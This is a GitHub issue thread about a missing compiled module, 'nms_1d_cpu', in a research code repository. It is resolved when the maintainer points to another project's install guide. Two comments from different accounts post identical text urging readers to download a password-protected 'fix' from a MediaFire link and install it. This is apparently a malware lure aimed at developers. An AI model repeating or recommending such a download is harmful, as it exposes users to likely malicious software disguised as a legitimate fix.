### ISSUE TITLE
ModuleNotFoundError: No module named 'nms_1d_cpu'

### ISSUE THREAD

**Issue by Y-Haneji** [robert80203/EgoPER_official#2]
@robert80203 
At line 5 in `libs/utils/nms.py`, `import nms_1d_cpu` raises the subject error. The reason may be that this repository misses `libs/utils/setup.py` and doesn't complete the installation of the C++ library. This speculation is based on the ActionFormer repository.

References
- https://github.com/happyharrycn/actionformer_release/blob/61ea7eb9308a568b0cf45e3804830836e30061de/INSTALL.md
- https://github.com/happyharrycn/actionformer_release/blob/61ea7eb9308a568b0cf45e3804830836e30061de/libs/utils/setup.py

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robert80203** [comment]
Thanks for reminding.
Please follow the instructions in ActionFormer to install `nms_1d_cpu`

**Comment by Y-Haneji** [comment]
I see. I successfully ran the scripts.
